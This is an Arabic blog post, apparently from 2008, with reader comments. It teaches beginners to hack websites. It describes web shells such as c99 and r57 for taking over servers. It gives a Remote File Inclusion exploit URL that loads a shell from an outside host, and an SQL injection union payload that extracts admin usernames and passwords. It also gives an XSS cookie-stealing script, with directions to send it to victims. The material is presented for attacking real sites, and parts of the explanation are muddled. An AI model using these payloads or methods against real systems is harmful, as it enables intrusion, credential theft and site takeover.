اختراق المواقع في موجز للمبتدئين فقط

28 أغسطس, 2008 بواسطة alkrsan

اختراق المواقع لطالمى كثر طالبي شروحات اختراق المواقع و مع ان الشروحات متوفرة على الانترنت الا ان هناك مشاكل و هي انة الشروحات مبعثرة و غير مرتبة فالفرق بين دورة اختراق المواقع و قسم اختراق المواقع هو ترتيب الدروس الدرس الاول الثاني الثالث و لكن قسم اختراق المواقع لا يحتوي على ذالك فقط بل اكثر من هذا و لكن مشكلتة و حيدة و هي انة ملخبط اليكم بوابة يعني بداية شروحات اختراق المواقع لو عرفت لهذة الشروحات الباقية سهلة

(الشل) تعريفة - استخدامة - انواعة
(الشل) تعريفة - استخدامة - انواعة


الشل


هو سكربت في ملف و احد يربط المستخدم بالسرفر فيتحكم بالسرفركامل و يتكون من اوامر و للشل انواع


استخدامة


يستخدم في سرقة المعلموت و في اختراق الانظمة و في الكراكز و الكراكز معروفين بجشعهم يعني يلقى موقع فية ثغرة على طول يخترقة لا يهمة اي حاجة و يسموهم بالغة الانجليزي


Kids يعني اطفال الهكرز و هم اكبر خطر كأنك تعطي سلاح لطفل عمرة 5 سنوات فتخيل ايش يسوي فية


انواعة


هناك الكثير من الأنواع و لا اريد ان اذكرها لكم لكن هناك 2 شيلات التي تستخدم بكثرة


c99 - r57h


وضعت لكم الشرح مبسط و سهل للمبتدئين اذا اردت الملفات روح لك بالمنتدى سوي بحث او بقسم البرامج ارجو ان تكونو مركزين عشان تفهمو بسرعة و اقرائو كل كلمة اضعها لكم

________________________________________________________________

(الثغرة) تعريفها - انواعها - اشكالها
(الثغرة) تعريفها - انواعها - اشكالها


الثغرة

هي خطاء برمجي من المبرمج يعني تسمح للمستشكف الي يكتشف الثغرة
ان يستغل الموقع و يخترقة و يسرق معلوماتة او يخربة


انواعها


انواع الثغرات كثيرة لا اعرف بالتحديد و لكن هناك ثغرات منتشرة بكثرة و
ابتديها بالترتيب حسب الشهرة


1


Remote File Inclusion


اشهر و اكثر الثغرات انتشاراً فهذة الشغرة تسمح على طول برفع الشل


مثال 


 Xnova(Ogame)


http://www.xxxx.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?


لأحظ معي  ت غير xxxxx  الى عنوان الموقع 


و بعد عنوان الموقع السكربت و مكتوب نوع السكربت فوق الثغرة 


و بالنهاية تغير  


[shell]?


الى 


http://www.alkrsan.jeeran.com/alkrsan.txt?


طبعاً هذا شل انت سوي لك و احد تستعملة عشان تكون مجهزة لك
 



2


Remote SQL Injection


هذة الثغرات تطلع لك كود الادمن مشفر او تتحكم بقاعدة البيانات و تزرع شل 


واسمها بالعربي حقن قواعد البيانات و هي ثاني اشهر ثغرة و هي ممتعة و لكن متعبة كثيراً في فك الهاشات


مثال


PhotoCart


' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*




قد يكون رابط الاستغلال طويل و لكن على طول يطلع النتيجة


الان لمى تجربة ما في الا تغير اسم الموقع و مش كل مرة اقلك هههههههه


3


xss


من اشهر الثغرات والتي ليست فقط في اختراق المواقع و انمى الايميل و العضويات و هذة الثغرة ثغرة الكوكيز


يعني تسوي بالمفكرة كود و تضغة بالمفكرة و تحفظة بصيغة صورة و ترسلة لشخص و يفتح و يكون معاك كوكيزة


اعذروني لن اضع مثال لهذة الثغرة لأنها قد ثؤوثر على التصفح


4


perl


ثغرة صعبة نوعاً ما فهي تحتاج للدوز و نادرة الاستعمال و عملها يطلع لك كلمة السر مشفره و تحتاج لبرنامج


لكي تجعل هذة الثغرة تعمل و هذة الثغرة لا تتعلموها الان اتعلموها لمى توقع معاكم خبرة بالثغرات الاولى


المثال (صعب يحتاج شرح طويل عريض ان شاء الله شوفوة بصفحه لوحد)


انتهيت


ملاحظة: لم اشرح كل انواع الثغرات بالعالم لكن هذة الثغرات المشهورة و المعروفة اتمنى ان تكونو فهمتم .
—————————————————————————–
( ثغرات xss)
( ثغرات xss)

السلام عليكم و رحمة الله و بركاتة


ثغرة


xss


قد تكون سهلة و صعبة لكن لها طرق في الاستخدام


http://www.milw0rm.com/exploits/5050


هذا رابط ثغرة في الماليروم انت شوف مكان فية


xss


هذاك الرابط رابط الثغرة بعد ان ترسله للشخص طبعاً تقول كيف با ترسلة ترسل لة رابط امى صوة او اي حاجة يعني صورة و لا اقلك تابع الشرح مصور


افتح المفكرة


انسخ هذا الكو


<scri pt>aler t(docu ment.co okie);</scr ipt>


احذفو الفراغات الي موجودها كلها


http://www.alkrsan.net/up/xss/1.jpg



http://www.alkrsan.net/up/xss/2.jpg


http://www.alkrsan.net/up/xss/3.jpg


http://www.alkrsan.net/up/xss/4.jpg


طبعاً انت بترسلها للواحد و تطبق الثغرة


يالله انتهى الشرح

_________________________________________________————————–____
( شرح رفع الشل )
( شرح رفع الشل )

السلام عليكم و رحمة الله و بركاتة


رفع الشل من اسهل الاشيا عملاً و يتم رفع الشل عن طرق


ثغرات



Remote File Inclusion


اليكم مثال




	 Xnova(Ogame)

	http://www.xxxx.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?

	لأحظ معي  ت غير xxxxx  الى عنوان الموقع 

	و بعد عنوان الموقع السكربت و مكتوب نوع السكربت فوق الثغرة 

	و بالنهاية تغير  

	[shell]?

	الى 

	http://www.alkrsan.jeeran.com/alkrsan.txt?

	طبعاً هذا شل انت سوي لك و احد تستعملة عشان تكون مجهزة لك


و هذا شرح بالفيديو للأخ شاجع



شرح بالفيديو طريقة رفع الشل بالمرفقات




(شرح ثغرات Remote SQL Injection )
(شرح ثغرات Remote SQL Injection )

السلام عليكم و رحمة الله و بركاتة


هذة الثغرة من الثغرات السهلة و سوف اشرح لكم طريقة


http://www.milw0rm.com/exploits/6280


هذا رابط ثغرة بالماليروم


في هذا المكان



username,password


يقل لك انة هذة الثغرة تجيب الاسم و كلمة السر


طبعاً ما تعرف كلمة السر هل هية مشفرة اذا كانت مشفره شاهد شرح فك التشفير


الان خلاص شرحنى لكم هذة الثغرات
————————————————–
شرح اكتشاف ثغرات Remote File Inclusion
شرح اكتشاف ثغرات Remote File Inclusion

السلام عليكم و رحمة الله و بركاتة


كما يقولون تعددت الأسباب و الموت و احدُ


و نحن نقول تعددت الشروحات و الهدف و احد و هو اظهار الاستغلال


لن اجعلكم تملو من الشرح سأضع لكم شرحين و نفس الهدف


الشرح الاول اليدوي


افتح اي سكربت على جهازك طبعاً و بعد فتحة افتح اي ملف من ملفاتة و لا اقلك تابع الشرح


اولاُ نفتح الملف طبعاً php


http://www.4kr.org/up/filincold/1.jpg


ثانياً


نبحث عن اي دالة تحمل رمز


$


http://www.4kr.org/up/filincold/2.jpg


ننسخها


الان نفتح المفكرة


http://www.4kr.org/up/filincold/3.jpg


الان انتهيت من الشرح الاول


—————————————


الشرح الثاني بالفيديو و متميز و بأستعمال برامج طبعاً 2 فقط


حصرياً(شرح) اكتشاف ثغرات فايل انكلود و رفع الشل بالفيديو لأول مرة


اتمنى ان اكون قد شرحت كيف تكشف ثغرات فايل انكلود تحياتي

———————————————————————–

شرح اكتشاف ثغرات sql او شرح حقن قواعد البيانات
شرح اكتشاف ثغرات sql او شرح حقن قواعد البيانات

شرح خاص للأخ الشبح الدموي


اضغط هنا

————————————————————————
شرح اكتشاف ثغرات xss
شرح اكتشاف ثغرات xss

السلام عليكم ثغرات


xss



اليكم الشر


افتح الملف


http://www.alkrsan.net/up/xss/s1.jpg


الان اي دالة


قدامها هذة الاشارة


$


http://www.alkrsan.net/up/xss/s2.jpg


تنسخها


http://www.alkrsan.net/up/xss/s3.jpg


انتهى الشرح

____________________________________

————————————-

————————————-

————————————-

————————————-

المزيد……

تحت تصنيف هكرز و اختراق |

التعليقات 12 على “اختراق المواقع في موجز للمبتدئين فقط”

  1. DanTe علق:
    30 أغسطس 2008 في الساعة 12:04 م

    السلام عليكم
    يعطيك ألف عافية على هذا المدونة الرائعة والدروس المفيدة وإنشالله إلى الأمان ( وخلينا نشوفك )
    وعليكم السلام

  2. mido علق:
    6 سبتمبر 2008 في الساعة 4:13 ص

    لو سمحت يا غالى ممكن تقولى ازاى اتطور دردشتي انا عارف انه خارج الاختراق بس معلش موش عاوز اشترى حاجه واحد غيري اصلا مطورها وادفع انا تمنها

  3. alkrsan علق:
    8 سبتمبر 2008 في الساعة 2:33 م

    ايش بتقول انت يا جني و الله ما انا فاهم شي

  4. Infotech Ltd. علق:
    8 سبتمبر 2008 في الساعة 11:47 م

    ooooooooooooooooooooooooo

  5. hacker dom علق:
    8 سبتمبر 2008 في الساعة 11:49 م

    يابو الشباب
    يلي اسمك كاسبر اضف بريدي
    r( @ )hotmail.com

    علشان تعرف الهكر على اصوله
    والله اخليك تكره شيء اسمه هكر واذكرك

  6. hacker dom علق:
    8 سبتمبر 2008 في الساعة 11:50 م

    اقصد يلي اسمك الكاسر خخخخخخخخ

  7. hacker dom علق:
    8 سبتمبر 2008 في الساعة 11:50 م

    خخخخخ مدري القرصان كككككككككككككككككك

  8. alkrsan علق:
    9 سبتمبر 2008 في الساعة 4:17 ص

    واوووو على ايش تضحك على خيبتك يا قلبي

  9. Pirate. M66M علق:
    24 أكتوبر 2008 في الساعة 5:12 م

    ممتاز وبتوفيق ياقرصان الهكر …

    اذا رايت الطيور قد هاجرت ورايت الناس هاربين واصحاب الحمايه خائفين فاعلم اني قد اتيت Pirate. M66M

  10. alkrsan علق:
    24 أكتوبر 2008 في الساعة 5:36 م

    هههههههههههههههههههههههههههههههه
    ايش هذا الرعب يا جني و الله انك خطير استمرو بالردود يا شباب خلوني ابدع و ابدع هع هع هع هع هع هع هع هع هع هع هع هع هع هع

  11. أنا علق:
    13 نوفمبر 2008 في الساعة 11:19 م

    شرح طويل عنرجع نبسر الخبر حقك

  12. Dr.pHp علق:
    21 نوفمبر 2008 في الساعة 9:42 م

    شرح رائع لمبتدي…

    جزاك الله خيرأ

أضف تعليقاً

-